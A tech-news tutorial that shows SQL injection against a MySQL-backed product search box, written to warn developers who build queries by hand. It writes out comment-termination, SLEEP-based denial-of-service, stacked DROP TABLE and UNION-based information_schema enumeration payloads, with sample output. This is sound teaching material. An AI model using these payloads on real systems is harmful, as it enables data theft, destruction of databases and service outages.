2025-02-22 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article introduces the basic principles of SQL injection by walking through one complete attack on a simple product search form. If you build SQL statements by hand, it is worth the few minutes it takes to read.
Basic principles of SQL injection
Web technology changes by the day, but hand-written SQL is still favoured by a good number of developers: concatenating a query by hand is quicker and more direct than learning an ORM's rules. Most people who build SQL this way have heard that SQL injection is dangerous, yet still think: my statement is so simple, there is no way it can be injected.
Take five minutes to read this complete example and you will not be tempted to take that chance again.
A simple scenario
There is a web page with a search box: enter a product name and it lists the matching products with their price, place of production and date of production. Entering Hammer displays:
Product        Price   Place of production   Date of production
Claw Hammer    12.98   American              2019.11.07
Club Hammer    29.98   Canada                2019.11.11
We skip the construction of the search page itself and focus on the part that matters: the SQL injection.
To implement this, the server's SQL statement is most likely of the form:
SELECT ? FROM ? WHERE ? LIKE '%Hammer%'
The question marks stand for the table and column names we do not know yet. The only part of this statement we control is the text inside the single quotes, '%Hammer%'. Suppose we type a single quotation mark into the search box. The statement becomes:
SELECT ? FROM ? WHERE ? LIKE '%'%'
The unmatched quote makes the statement a syntax error, so nothing is returned. To get rid of the dangling quote we comment out the rest of the line with --. Entering ';-- gives:
SELECT ? FROM ? WHERE ? LIKE '%';--%'
Everything after -- is a comment (# works too in MySQL), so the statement is simply LIKE '%' and returns every product. One practical detail: MySQL only treats -- as a comment when it is followed by a space or other whitespace, so the real payload is ';-- with a trailing space, or ';#. So far nothing looks dangerous:
Product        Price   Place of production   Date of production
Claw Hammer    12.98   American              2019.11.07
Club Hammer    29.98   Canada                2019.11.11
Paring Knife   10.98   China                 2019.11.11
Boning Knife   19.98   China                 2019.01.01
A first try
Hold on to the quote-and-comment trick from the previous step and try a simple delay:
SELECT ? FROM ? WHERE ? LIKE '%Hammer%' AND 1 = SLEEP(2);--%'
The request now takes at least two seconds to come back (SLEEP() returns 0, so the condition is false and no rows are shown, but the delay itself is the signal). Lengthen the sleep, fire a few dozen of these requests from a script, and every connection in the application's database pool is tied up sleeping: a denial of service from a search box.
Of course, there are more destructive options:
SELECT ? FROM ? WHERE ? LIKE '%Hammer%'; DROP TABLE xxxx;--%'
This deletes a table (or, with DROP DATABASE, the whole database) outright. Note that a stacked second statement like this only runs if the application's database driver has multi-statement execution enabled; many MySQL client libraries disable it by default, whereas the UNION technique below needs no such help. And how would we know which tables exist in the first place, that is, what to put in place of xxxx?
Do whatever you want with UNION
We need to know which tables the database contains; only then can we get at anything useful. UNION lets us append the rows of a second query to the search results, provided both sides return the same number of columns. Let's try:
SELECT ?, ?, ?, ? FROM ? WHERE ? LIKE '%Hammer%' UNION (SELECT 1, 2, 3, 4 FROM dual);--%'
Product        Price   Place of production   Date of production
Claw Hammer    12.98   American              2019.11.07
Club Hammer    29.98   Canada                2019.11.11
1              2       3                     4
The fake row 1, 2, 3, 4 is stitched into the search results. (If the column count were wrong, MySQL would refuse with an error; an attacker simply adds columns until it stops complaining.)
MySQL keeps its metadata in the information_schema database, so we look there for something useful:
SELECT ?, ?, ?, ? FROM ? WHERE ? LIKE '%Hammer%' UNION (SELECT TABLE_NAME, TABLE_SCHEMA, 3, 4 FROM information_schema.tables);--%'
Product        Price       Place of production   Date of production
Claw Hammer    12.98       American              2019.11.07
Club Hammer    29.98       Canada                2019.11.11
author         hawkeye34   3                     4
products       hawkeye34   3                     4
user           hawkeye34   3                     4
(Without a filter such as WHERE TABLE_SCHEMA = DATABASE() the result also lists every system table; only the application's own schema, hawkeye34, is shown here.) With the database and table names in hand, anyone can do as they please, including the DROP above.
From the list we guess that the search is reading the products table, so next we dig out its columns:
SELECT ?, ?, ?, ? FROM ? WHERE ? LIKE '%Hammer%' UNION (SELECT COLUMN_NAME, TABLE_SCHEMA, 3, 4 FROM information_schema.columns WHERE table_name = 'products');--%'
Product        Price       Place of production   Date of production
Claw Hammer    12.98       American              2019.11.07
Club Hammer    29.98       Canada                2019.11.11
id             hawkeye34   3                     4
name           hawkeye34   3                     4
price          hawkeye34   3                     4
address        hawkeye34   3                     4
updated_at     hawkeye34   3                     4
Those two steps give us the table name and the column names, so the full query behind the search API (filling in all the question marks above) must be:
SELECT name, price, address, updated_at FROM products WHERE name LIKE '%Hammer%'
Repeating the same steps, the entire database, including the user table found above, can be pulled out through this one small entry point.